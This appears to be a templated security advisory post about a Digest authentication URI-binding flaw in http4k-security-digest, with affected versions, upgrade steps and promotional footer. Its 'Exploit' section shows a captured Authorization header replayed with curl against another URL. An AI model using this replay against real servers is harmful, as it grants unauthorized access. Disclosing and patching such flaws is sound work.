Listen to this Post
An issue in DigestAuthProvider.verify: the `uri` parameter in the client’s `Authorization: Digest …` response was not checked against the actual request URL. A captured Digest authentication response could be replayed against any other URL served by the same realm, breaking the per-request-URL binding the Digest scheme assumes. Any application using `http4k-security-digest` for HTTP Digest authentication is affected. The bug has been present since `DigestAuthProvider` was introduced (commit 8a52b615b1, 2021). The fix rejects credentials whose `uri` parameter does not match the request URL. For deployments that cannot upgrade immediately, place Digest auth behind a reverse proxy that pins requests to a single URL.
DailyCVE Form:
Platform: http4k-security-digest
Version: <=6.49.0.0 / <=5.41.0.0 / <=4.50.0.0
Vulnerability: Digest URI Binding Bypass
Severity: High
date: 2026-06-16
Prediction: 2026-06-16 (Patch already released)
What Undercode Say:
Check your http4k-security-digest version
./gradlew dependencies | grep http4k-security-digest
Example vulnerable configuration (Kotlin)
val auth = DigestAuthProvider(
realm = "My Realm",
credentials = { ... }
) // No URI validation
Fixed version check (build.gradle.kts)
dependencies {
// Vulnerable
// implementation("org.http4k:http4k-security-digest:6.49.0.0")
// Fixed (Community)
implementation("org.http4k:http4k-security-digest:6.50.0.0")
}
Exploit: (Educational Purposes!)
1. Capture a valid Digest auth response (e.g., via proxy or network sniffing) Example Authorization header: Authorization: Digest username="user", realm="My Realm", nonce="abc123", uri="/api/resource1", response="hash123", ... 2. Replay the same Authorization header against a different URL in same realm curl -X GET http://target/api/resource2 \ -H 'Authorization: Digest username="user", realm="My Realm", nonce="abc123", \ uri="/api/resource1", response="hash123", ...' The server accepts it because uri is not validated against /api/resource2
Protection:
- Upgrade to `http4k-security-digest` 6.50.0.0 (Community), 5.42.0.0 (Enterprise LTS), or 4.51.0.0 (Enterprise LTS)
- If unable to upgrade, place Digest authentication behind a reverse proxy that pins requests to a single URL
- Contact [email protected] for Enterprise LTS access
Impact:
- A captured Digest authentication response can be replayed against any other URL served by the same realm
- Breaks the per-request-URL binding that the Digest authentication scheme assumes
- Affects all applications using `http4k-security-digest` for HTTP Digest authentication
- Present since `DigestAuthProvider` in 2021 (commit
8a52b615b1)
🎯Let’s Practice Exploiting & Learn Patching For Free:
🎓 Live Courses & Certifications:
Join Undercode Academy for Verified Certifications
🚀 Request a Custom Project:
Secure, high-velocity infrastructure and disruptive technological engineering. Contact our engineering team for high-tier development and proprietary systems:
[email protected]
💎 Smart Architecture | 🛡️ Secure by Design | ⭐ Trusted by Thousands
Sources:
Reported By: github.com
Extra Source Hub:
Undercode

